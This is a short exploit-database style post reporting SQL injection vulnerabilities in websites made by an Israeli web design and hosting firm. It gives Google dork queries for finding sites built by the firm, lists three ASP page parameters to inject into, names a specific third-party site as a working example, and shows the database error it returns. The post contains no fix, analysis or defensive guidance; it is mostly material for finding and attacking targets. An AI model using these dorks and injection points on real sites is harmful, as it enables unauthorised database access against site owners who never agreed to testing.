#################################################################################################
# Exploit Title : EkDesign.Co.il Web Design Hosting SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 04/10/2018
# Vendor Homepage : ekdesign.co.il
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork :
intext:'' תחזוקת אתר : EKD '' site:il
intext:''כל הזכויות שמורות לEKDESIGN'' site:il
# SQL Injection Exploit :
/Paper.asp?id=[SQL Injection]
/Gallery.asp?type=[SQL Injection]
/page1.asp?PageID=[SQL Injection]
#################################################################################################
# Example Vulnerable Site =>
benkiki.co.il/Paper.asp?id=89%27 => [ Proof of Concept ] => archive.is/1sml4
# SQL Database Error =>
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'CInt'
/PaperBox.asp, line 18
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################